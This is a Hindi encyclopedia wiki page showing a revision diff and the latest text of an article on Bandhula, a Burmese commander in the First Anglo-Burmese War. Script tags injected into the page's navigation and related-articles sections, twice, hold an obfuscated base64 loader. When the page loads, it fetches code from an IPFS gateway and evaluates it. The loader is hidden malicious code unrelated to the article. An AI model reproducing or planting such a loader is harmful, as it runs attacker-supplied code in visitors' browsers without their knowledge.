Difference between revisions of "बन्धुल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 4: Line 4:
 
*उसे सफलता मिलने का इतना भरोसा था कि [[गवर्नर-जनरल]] [[लॉर्ड एमहर्स्ट]] के लिए वह [[सोना|सोने]] की बेड़ियाँ अपने साथ लाया था।
 
*उसे सफलता मिलने का इतना भरोसा था कि [[गवर्नर-जनरल]] [[लॉर्ड एमहर्स्ट]] के लिए वह [[सोना|सोने]] की बेड़ियाँ अपने साथ लाया था।
 
*बंधुल ने चटगाँव सीमा के निकट एक [[अंग्रेज़]] रेजिमेण्ट को पूर्णत: पराजित कर दिया था।
 
*बंधुल ने चटगाँव सीमा के निकट एक [[अंग्रेज़]] रेजिमेण्ट को पूर्णत: पराजित कर दिया था।
*अंग्रेज़ों ने इस बीच [[रंगून]] पर नौसेनिक अभियान करके मई, 1824 ई. में उस पर क़ब्ज़ा कर लिया।
+
*अंग्रेज़ों ने इस बीच रंगून (अब [[यांगून]]) पर नौसेनिक अभियान करके मई, 1824 ई. में उस पर क़ब्ज़ा कर लिया।
 
*ब्रिटिश आक्रमणकारियों का सामना करने के लिए तब बंधुल को बर्मा वापस बुला लिया गया।
 
*ब्रिटिश आक्रमणकारियों का सामना करने के लिए तब बंधुल को बर्मा वापस बुला लिया गया।
*यहाँ सेनापति के रूप में उसने बड़े रणकौशल का परिचय दिया, लेकिन रंगून के क़ब्ज़े के लिए दिसम्बर 1824 ई. में किये गये हमले में वह पराजित हो गया।
+
*यहाँ सेनापति के रूप में उसने बड़े रणकौशल का परिचय दिया, लेकिन रंगून (अब [[यांगून]]) के क़ब्ज़े के लिए दिसम्बर 1824 ई. में किये गये हमले में वह पराजित हो गया।
 
*वहाँ से पीछे हटकर डोनाबियू में लकड़कोट के सहारे वह बहादुरी के साथ शत्रुओं का मुक़ाबला करता रहा।
 
*वहाँ से पीछे हटकर डोनाबियू में लकड़कोट के सहारे वह बहादुरी के साथ शत्रुओं का मुक़ाबला करता रहा।
 
*तभी अचानक एक रॉकेट आ लगने के कारण 2 अप्रैल 1825 ई. में उसकी मृत्यु हो गई।
 
*तभी अचानक एक रॉकेट आ लगने के कारण 2 अप्रैल 1825 ई. में उसकी मृत्यु हो गई।

Latest revision as of 07:32, 22 January 2013

bandhul athava mahabandhul ek prasiddh barmi (barma) senapati tha. pratham aangl-barmi yuddh (1824-1826 ee.) chhi dane par usane bangal mean barmi sena ka netritv kiya tha. ek senapati ke roop mean usamean adbhut ranakaushal tha. usaki mrityu 2 aprail, 1825 ee. mean huee thi.

  • pratham aangl-barmi yuddh ke samay bandhul ko apani saphalata tatha vijay ka poorn vishvas tha.
  • use saphalata milane ka itana bharosa tha ki gavarnar-janaral l aaurd emaharst ke lie vah sone ki be diyaan apane sath laya tha.
  • bandhul ne chatagaanv sima ke nikat ek aangrez rejiment ko poornat: parajit kar diya tha.
  • aangrezoan ne is bich rangoon (ab yaangoon) par nausenik abhiyan karake mee, 1824 ee. mean us par qabza kar liya.
  • british akramanakariyoan ka samana karane ke lie tab bandhul ko barma vapas bula liya gaya.
  • yahaan senapati ke roop mean usane b de ranakaushal ka parichay diya, lekin rangoon (ab yaangoon) ke qabze ke lie disambar 1824 ee. mean kiye gaye hamale mean vah parajit ho gaya.
  • vahaan se pichhe hatakar donabiyoo mean lak dakot ke sahare vah bahaduri ke sath shatruoan ka muqabala karata raha.
  • tabhi achanak ek r aauket a lagane ke karan 2 aprail 1825 ee. mean usaki mrityu ho gee.
  • is prakar pratham aangl-barma yuddh mean barma parajit ho gaya.
  1. REDIRECTsaancha:inhean bhi dekhean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 270 |


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>